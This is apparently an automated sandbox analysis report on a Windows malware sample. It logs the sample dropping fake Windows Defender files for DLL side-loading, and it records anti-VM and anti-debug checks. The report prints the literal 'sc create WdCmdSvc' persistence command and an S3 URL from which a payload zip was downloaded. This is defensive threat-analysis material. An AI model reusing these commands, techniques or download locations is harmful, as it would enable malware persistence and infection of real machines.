          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ContentPack\BumpFiles.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpOAV.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetours.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpProvider.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCommu.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\shellext.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\NisSrv.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dllJump to dropped file
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-12510
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5892Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 2556Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00235564 FindFirstFileExW,0_2_00235564
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040D3E4 FindFirstFileW,FindClose,4_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,4_2_0040CE18
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040D3E4 FindFirstFileW,FindClose,7_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_0040CE18
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00229ED6 VirtualQuery,GetSystemInfo,0_2_00229ED6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: BumpFiles.exe, 00000007.00000002.3857430328.00000000033D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
          Source: DefenderCSP.dll.7.drBinary or memory string: 3(%lsMicrosoft HvVMwareVMware
          Source: DefenderCSP.dll.7.drBinary or memory string: DefenderDetectionsNameURLSeverityCategoryCurrentStatusExecutionStatusInitialDetectionTimeLastThreatStatusChangeTimeNumberOfDetectionsHealthProductStatusComputerStateDefenderEnabledRtpEnabledNisEnabledQuickScanOverdueFullScanOverdueSignatureOutOfDateRebootRequiredFullScanRequiredEngineVersionSignatureVersionDefenderVersionQuickScanTimeFullScanTimeQuickScanSigVersionFullScanSigVersionTamperProtectionEnabledIsVirtualMachineConfigurationDeviceControlPolicyGroupsGroupDataPolicyRulesRuleDataTamperProtectionEnableFileHashComputationMeteredConnectionUpdatesSupportLogLocationExcludedIpAddressesAllowNetworkProtectionOnWinServerDisableCpuThrottleOnIdleScansDisableLocalAdminMergeSchedulerRandomizationTimeDisableTlsParsingDisableHttpParsingDisableDnsParsingDisableDnsOverTcpParsingDisableSshParsingPlatformUpdatesChannelEngineUpdatesChannelSecurityIntelligenceUpdatesChannelDisableGradualReleaseAllowNetworkProtectionDownLevelEnableDnsSinkholeDisableInboundConnectionFilteringDisableRdpParsingAllowDatagramProcessingOnWinServerDisableNetworkProtectionPerfTelemetryHideExclusionsFromLocalAdminsThrottleForScheduledScanOnlyASROnlyPerRuleExclusionsDataDuplicationDirectoryDataDuplicationRemoteLocationDisableFtpParsingDeviceControlEnabledDefaultEnforcementAllowSwitchToAsyncInspectionScanUpdateSignatureOfflineScanRollbackPlatformRollbackEngineNULL
          Source: ProtectionManagement.dll.7.drBinary or memory string: Microsoft HvVMwareVMware
          Source: BumpFiles.exe, 00000004.00000002.3857556517.0000000003312000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_
          Source: BumpFiles.exe, 00000007.00000002.3857430328.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.000000000344A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: ProtectionManagement.dll.7.drBinary or memory string: VMwareVMware
          Source: ProtectionManagement.mfl0.7.drBinary or memory string: quina virtual") : Amended ToSubclass] boolean IsVirtualMachine;
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeAPI call chain: ExitProcess graph end nodegraph_4-10986
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeAPI call chain: ExitProcess graph end nodegraph_7-11570
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022A2FF IsDebuggerPresent,OutputDebugStringW,0_2_0022A2FF
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00227326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,0_2_00227326
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_002352EB mov eax, dword ptr fs:[00000030h]0_2_002352EB
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00231584 mov eax, dword ptr fs:[00000030h]0_2_00231584
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_00236580 GetProcessHeap,0_2_00236580
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022A3EF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0022A3EF
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022AE25 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0022AE25
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022DED4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0022DED4
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022AFBB SetUnhandledExceptionFilter,0_2_0022AFBB
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_00633718 ShellExecuteExW,WaitForSingleObject,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,4_2_00633718
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrunJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= autoJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= autoJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022AC7E cpuid 0_2_0022AC7E
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,4_2_0040D51C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0040C9BC
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,7_2_0040D51C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0040C9BC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_0022B06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0022B06B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_0040F148 GetVersion,4_2_0040F148
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: BumpFiles.exe, BumpFiles.exe, 00000007.00000002.3857980024.0000000004EB1000.00000004.00001000.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857980024.0000000004DDA000.00000004.00001000.00020000.00000000.sdmp, fuge.zip1.7.drBinary or memory string: MsMpEng.exe
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeCode function: 0_2_002212B1 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_002212B1

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		11
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts3
          Command and Scripting Interpreter          		2
          Windows Service          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop ProtocolData from Removable Media11
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution          		1
          Registry Run Keys / Startup Folder          		2
          Windows Service          		2
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
          Process Injection          		1
          Software Packing          		NTDS35
          System Information Discovery          		Distributed Component Object ModelInput Capture13
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
          Registry Run Keys / Startup Folder          		1
          Timestomp          		LSA Secrets1
          Query Registry          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials131
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Masquerading          		DCSync1
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
          Virtualization/Sandbox Evasion          		Proc Filesystem31
          Virtualization/Sandbox Evasion          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
          Process Injection          		/etc/passwd and /etc/shadow11
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1397701 Sample: 0219830219301290321012notas.exe Startdate: 23/02/2024 Architecture: WINDOWS Score: 76 55 s3-r-w.sa-east-1.amazonaws.com 2->55 57 awsserver903203232.s3.sa-east-1.amazonaws.com 2->57 63 Multi AV Scanner detection for dropped file 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 Machine Learning detection for dropped file 2->67 69 Yara detected Generic Downloader 2->69 11 0219830219301290321012notas.exe 4 2->11         started        14 0219830219301290321012notas.exe 2->14         started        signatures3 process4 file5 53 C:\Users\user\AppData\Local\...\Update.exe, PE32 11->53 dropped 16 Update.exe 14 20 11->16         started        process6 file7 37 C:\Users\user\AppData\...\vcruntime140.dll, PE32 16->37 dropped 39 C:\Users\user\AppData\Local\...\MpSvc.dll, PE32 16->39 dropped 41 C:\Users\user\AppData\Local\...\BumpFiles.exe, PE32 16->41 dropped 43 2 other malicious files 16->43 dropped 61 Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS) 16->61 20 BumpFiles.exe 1 16->20         started        signatures8 process9 signatures10 71 Uses shutdown.exe to shutdown or reboot the system 20->71 73 Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS) 20->73 75 Found evasive API chain checking for user administrative privileges 20->75 23 BumpFiles.exe 76 20->23         started        process11 dnsIp12 59 s3-r-w.sa-east-1.amazonaws.com 3.5.232.21, 443, 49704 AMAZON-02US United States 23->59 45 C:\Program Files (x86)\...\shellext.dll, PE32+ 23->45 dropped 47 C:\Program Files (x86)\...\shellext.dll.mui, PE32 23->47 dropped 49 C:\...\ProtectionManagement.dll.mui, PE32 23->49 dropped 51 42 other malicious files 23->51 dropped 27 cmd.exe 1 23->27         started        29 shutdown.exe 1 23->29         started        file13 process14 process15 31 conhost.exe 27->31         started        33 sc.exe 1 27->33         started        35 conhost.exe 29->35         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0219830219301290321012notas.exe16%ReversingLabs
          0219830219301290321012notas.exe16%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\Microsoft.NET\MpClient.dll100%Joe Sandbox ML
          C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\EppManifest.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\EppManifest.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpClient.dll11%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll7%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCommu.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpCommu.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpDetours.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpDetours.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpOAV.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpOAV.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpProvider.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpProvider.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpRtp.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpRtp.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MpSvc.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MpSvc.dll0%VirustotalBrowse
          C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll0%ReversingLabs
          C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll0%VirustotalBrowse

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://defaultcontainer/ContentPack.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.diff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.bsdiff0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.nuspec0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/vcruntime140.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.exe0%Avira URL Cloudsafe
          http://defaultcontainer/_rels/.rels0%Avira URL Cloudsafe
          http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.dll0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.rels0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.shasum0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/BumpFiles.exe0%Avira URL Cloudsafe
          http://defaultcontainer/tempfiles/sample.psmdcp0%Avira URL Cloudsafe
          http://defaultcontainer/lib/net48/MpSvc.dll0%Avira URL Cloudsafe
          http://schemas.openxmlformats.or0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          s3-r-w.sa-east-1.amazonaws.com
          		3.5.232.21
          		truefalse
            		high
            awsserver903203232.s3.sa-east-1.amazonaws.com
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipfalse
                		high

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://github.com/myuser/myrepoUpdate.exefalse
                  		high
                  http://defaultcontainer/tempfiles/sample.bsdiffUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		low
                  http://www.apache.org/licenses/LICENSE-2.0ThirdPartyNotices.txt.7.drfalse
                    		high
                    http://defaultcontainer/ContentPack.nuspecUpdate.exe, 00000003.00000002.2050601484.0000000003433000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://defaultcontainer/lib/net48/vcruntime140.dllUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.delphiforfun.org/openUBumpFiles.exe, 00000004.00000002.3855628720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, BumpFiles.exe, 00000007.00000002.3855472220.0000000000401000.00000020.00000001.01000000.00000009.sdmp, MpSvc.dll.3.drfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousMpCommu.dll.7.drfalse
                        		high
                        http://defaultcontainer/tempfiles/sample.diffUpdate.exe, 00000003.00000002.2050601484.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2050601484.000000000341A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zipINC:BumpFiles.exe, 00000007.00000003.2064736054.0000000003456000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
